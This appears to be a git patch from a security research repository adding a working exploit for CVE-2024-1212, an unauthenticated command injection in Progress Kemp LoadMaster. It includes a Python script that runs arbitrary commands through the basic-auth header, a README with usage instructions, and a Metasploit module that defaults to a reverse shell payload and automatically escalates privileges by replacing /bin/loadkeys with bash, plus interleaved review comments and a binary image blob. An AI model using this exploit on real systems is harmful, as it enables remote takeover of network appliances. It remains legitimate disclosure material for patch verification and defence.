From 5a8a723e3023abe600b681ed37073ac38b64b384 Mon Sep 17 00:00:00 2001
From: DaveYesland
Date: Tue, 19 Mar 2024 07:04:12 -0700
Subject: [PATCH] add CVE-2024-1212
---
CVE-2024-1212/CVE-2024-1212.py | 33 +++++
CVE-2024-1212/README.md | 20 +++
...ss_kemp_loadmaster_unauth_cmd_injection.rb | 137 ++++++++++++++++++
CVE-2024-1212/poc_image.gif | Bin 0 -> 30491 bytes
4 files changed, 190 insertions(+)
create mode 100644 CVE-2024-1212/CVE-2024-1212.py
create mode 100644 CVE-2024-1212/README.md
create mode 100644 CVE-2024-1212/metasploit/exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection.rb
create mode 100644 CVE-2024-1212/poc_image.gif
diff --git a/CVE-2024-1212/CVE-2024-1212.py b/CVE-2024-1212/CVE-2024-1212.py
new file mode 100644
index 0000000..c8aecd6
--- /dev/null
+++ b/CVE-2024-1212/CVE-2024-1212.py
@@ -0,0 +1,33 @@
+# Exploit for CVE-2024-1212: Unauthenticated RCE in Progress Kemp LoadMaster
+# Tested on: LoadMaster 7.2.59.0.22007
+# Author: Dave Yesland @daveysec with Rhino Security Labs
+
+import requests
+from requests.auth import HTTPBasicAuth
+import argparse
+
+requests.packages.urllib3.disable_warnings()
+
+argparser = argparse.ArgumentParser(description="Exploit for CVE-2024-1212: Unauthenticated RCE in Progress Kemp LoadMaster")
+argparser.add_argument('target', help='The target (https://LoadmasterIP)')
+argparser.add_argument('command', help='The command to run')
+args = argparser.parse_args()
+
+target = args.target
+command = args.command
+
+normal_headers = ["Date", "Connection", "Content-Type", "Transfer-Encoding"]
+
+# Fix colons as it will break the basic auth
+command = command.replace(":", "$'\\x3a'")
+
+url = f"{target}/access/set?param=enableapi&value=1"
+r = requests.get(url, auth=HTTPBasicAuth(f"';{command};echo '", "anything"), verify=False)
+for key, value in r.headers.items():
+ if key not in normal_headers:
+ print(f"{key}: {value}")
+for line in r.text.splitlines():
+ if line == ' -p anything':
+ break
+ else:
+ print(line)
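Review bot: The `requests.get` call sets `verify=False` but no `timeout`, so the script blocks indefinitely when the address given as `target` does not answer; adding `timeout=10` to that call bounds it. The header comment records only the build the script was tested on, so someone using it to confirm that an appliance has been patched has to go to the README for the fixed releases; I would add `# Fixed in 7.2.59.2 (GA), 7.2.54.8 (LTSF), 7.2.48.10 (LTS)` under the `# Tested on` line.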
diff --git a/CVE-2024-1212/README.md b/CVE-2024-1212/README.md
new file mode 100644
index 0000000..a86a847
--- /dev/null
+++ b/CVE-2024-1212/README.md
@@ -0,0 +1,20 @@
+# CVE-2024-1212: Unauthenticated RCE in Progress Kemp LoadMaster
+
+## Information
+**Description:** This allows remote code execution in the Progress Kemp LoadMaster via the admin web service.
+**Versions Affected:** All LoadMaster releases after 7.2.48.1
+**Version Fixed:** 7.2.59.2 (GA), 7.2.54.8 (LTSF), 7.2.48.10 (LTS)
+**Researcher:** Dave Yesland
+**Disclosure Link:** PLACEHOLDER
+**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2024-1212
+**Vendor Advisory:** https://support.kemptechnologies.com/hc/en-us/articles/23878931058445-LoadMaster-Security-Vulnerability-CVE-2024-1212
+
+## Proof-of-Concept Exploit
+### Description
+The exploit bypasses API restrictions and executes commands through a command injection in the basic authorization header.
+
+### Usage/Exploitation
+`python3 CVE-2024-1212.py https://LM_host 'ls'`
+
+### Screenshot
+![Alt-text that shows up on hover](poc_image.gif)
diff --git a/CVE-2024-1212/metasploit/exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection.rb b/CVE-2024-1212/metasploit/exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection.rb
new file mode 100644
index 0000000..1aae708
--- /dev/null
+++ b/CVE-2024-1212/metasploit/exploits/linux/http/progress_kemp_loadmaster_unauth_cmd_injection.rb
@@ -0,0 +1,137 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ prepend Msf::Exploit::Remote::AutoCheck
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Kemp LoadMaster Unauthenticated Command Injection',
+ 'Description' => %q{
+ This module exploits an unauthenticated command injection vulnerability in
+ Progress Kemp LoadMaster, versions before 7.2.59.2.
+ },
+ 'Author' => [
+ 'Dave Yesland with Rhino Security Labs',
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' => [
+ ['CVE', '2024-1212'],
+ ['URL', 'https://kemptechnologies.com/kemp-load-balancers'],
+ ['URL', 'https://www.rhinosecuritylabs.com/']
+ ],
+ 'DisclosureDate' => '2024',
+ 'Notes' => {
+ 'Stability' => [ CRASH_SAFE ],
+ 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],
+ 'Reliability' => [ REPEATABLE_SESSION ]
+ },
+ 'Platform' => ['unix', 'linux'],
+ 'Arch' => [ARCH_X86, ARCH_X64],
+ 'Targets' => [['Automatic', {}]],
+ 'Privileged' => false,
+ 'DefaultOptions' =>
+ {
+ 'PAYLOAD' => 'cmd/linux/https/x64/shell/reverse_tcp',
+ 'SSL' => true,
+ 'RPORT' => 443
+ },
+ 'Payload' =>
+ {
+ 'BadChars' => "\x3a\x27"
+ }
+ )
+ )
+
+ register_options([
+ OptString.new('TARGETURI', [true, 'The URI path to LoadMaster', '/']),
+ OptBool.new('PRIVESC', [true, 'Automatically try privesc to add sudo entry', true])
+ ])
+
+ @first_session_timestamp = nil
+ end
+
+ def exploit
+ uri = normalize_uri(target_uri.path, 'access', 'set')
+
+ print_status("Sending payload...")
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => uri,
+ 'vars_get' =>
+ {
+ 'param' => 'enableapi',
+ 'value' => "1"
+ },
+ 'authorization' => basic_auth("';#{payload.encoded};echo '", 'anything'),
+ 'verify' => false
+ })
+ end
+
+ def on_new_session(session)
+ # Kill the session if it was initiated too close to the first session
+ # This command injection tends to execute twice, so we want to kill
+ # the second session. Probably a better way to do this but I don't know it.
+ super
+ current_time = Time.now.to_i
+ if @first_session_timestamp.nil?
+ @first_session_timestamp = current_time
+ elsif current_time - @first_session_timestamp < 5
+ print_error("Detected a session initiated too close to the first session. Terminating it.")
+ session.kill
+ end
+
+ # Run privesc commands if PRIVESC is set to true
+ if datastore['PRIVESC']
+ execute_privesc_command(session)
+ else
+ print_status('Privilege escalation skipped.')
+ end
+ end
+
+ def execute_privesc_command(session)
+ print_status("Executing privilege escalation command...")
+ session.shell_command('sudo /bin/cp /bin/loadkeys /tmp/loadkeys')
+ session.shell_command('sudo /bin/cp /bin/bash /bin/loadkeys')
+ session.shell_command('sudo /bin/loadkeys -c /bin/bash')
+ session.shell_command('cp /tmp/loadkeys /bin/loadkeys')
+ end
+
+ def check
+ print_status("Checking if #{peer} is vulnerable...")
+
+ uri = normalize_uri(target_uri.path, 'access', 'set')
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => uri,
+ 'vars_get' => {
+ 'param' => 'enableapi',
+ 'value' => "1"
+ },
+ 'authorization' => basic_auth("'", 'anything'),
+ 'verify' => false
+ })
+
+ # No response from server
+ unless res
+ return CheckCode::Unknown
+ end
+
+ # Check for specific error pattern in headers or body to confirm vulnerability
+ if res.headers.to_s.include?("unexpected EOF while looking for matching") || res.body.include?("unexpected EOF while looking for matching")
+ return CheckCode::Vulnerable
+ else
+ return CheckCode::Safe
+ end
+ end
+
+ end
\ No newline at end of file
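Review bot: `execute_privesc_command` replaces `/bin/loadkeys` on the appliance with a copy of bash and restores it only in its last `shell_command`, with no result checked in between, and `PRIVESC` defaults to `true`, so an ordinary run alters a system binary on the load balancer unless the operator turns the option off. I would make it opt-in and describe what it really does, `OptBool.new('PRIVESC', [true, 'Attempt privilege escalation by temporarily replacing /bin/loadkeys', false])`, since the current help text mentions a sudo entry that the code never adds. In `on_new_session` the privesc branch is still reached after `session.kill`, so the duplicate session repeats the swap; a `return` after the kill avoids that. The `'Description'` also says "versions before 7.2.59.2", while the README in this commit lists fixed LTSF and LTS builds as well.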
diff --git a/CVE-2024-1212/poc_image.gif b/CVE-2024-1212/poc_image.gif new file mode 100644 index 0000000000000000000000000000000000000000..068d81e80d7b0e498880cedfe68868866a9e6762 GIT binary patch literal 30491 zcmeHwby(Kvwl>}I(ka~_-5}j9AdQ4{DP2l;cXxMpcZwpQgeWPE3I-{BKX@HBduI0R z+54P*&i7s4tZNOvzIa{p*Lv1^?sebyBP}b%%V*>aMFi;v0YQF=tR$(fCN8QX$nc{0DLM&x%p50~r|^{NWFNqFx6Y8X7t}ItB&?=D!kHzX=>19DICy zLPA1fVqy{!5>ir9GBPp>3JOX}N@{9qdV2c1cki;Wu&}YQv9q&tUI!N!7Y`2)FE1}2 zAD@7LfS{nDkdTmwh=`b&nD})_NJvOYNl8mf%gV|sC@3f^E32re+`oTcRaI5(??e4o zJb3UxLqkJbTU$?0@8QFT1_lO(x5DUF7#kZudi2P|#Khd(+{((z`Z{cEY;0|9?dD$jIpE z=-AlUxVX6Z>qtmQNK8yjN=iyeNl8sjO-oBlPfyRt$jHph%*x8j&d$!s$;r*l&CAQn zzm9_6L}6iJQBhHGadByBX?b~hMMXtrWo1=WRdscBO-)U0ZEam$U44ChLqkJjV`I~; zX#OQyT3T9LTie^)J32bLy1Kf%yL)xeE9HTXJ_Zrr%&I$eLFchIXyi+J3Bi+KmYOL z$Hm3P<>e*91q3<*u}n=)uRj77gWgC@ZhtU{QZ7TLHg7N-pTlZ#q&9yznoKW;|k;#vZ1l<-v~Q=4&TC#;CeS#{Fn9jYj{JZTL0g5Jh@S zs(4Wed7|RR^KXZaBC)N-@Fgi&;ykscT}Y6$A0^#$NP9Ejtuz+3bFwSrni&RiOOpA9 z@-X5_Mi#hieDlSNE3BV<5?!JlOi@!*Y1vt*M(j$VN_nz3QHVv+t*DDpF$|T=Q{1({ z{~dY({=$*vEx-HTM&LdFsH!I{_F+BRL&6q%WS_#n92oCMJ~HuY^U|NeAyQW`Mk7K- zgb&AurSKQWh(}#dc@}0V7=pA(|J|>t^c#sS zxgjK7_-l|fQ!Tnaus>XVqDfMr#zn=-;3=Jp$i$Z))_j=D4Id%a28C>-tOBKQ*YZUe z@_kF{BzVcCLROAt`ur=dB2Na2fT zgc5)w9G>2UWejpHjyj2P4+$E zL+mr#AIlY`)ChBXtcl0*HHALfzGI!%w`eL~N*~pTG;dyCI?Glc%J!zF9b~>4+_0F1 zlpi-@*rJjRSL=&!R0I{Cl(KxdTUKUiX-bA8;%Onr5|5q29-`4!v@ogBS8^B4=BvZD zXq=_MBvt3r@ej{Hr7|p!sBl9otFY=2Sj9Fe*1w5Zk~X-Ai9hypG~!3+#9Ndgip;rq z*$?}y?3IWb`PT_g^4*VtT;=YdH{s^`DsPYaLaM8fMZH7}S&r|

h5e_%){C2DENO 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 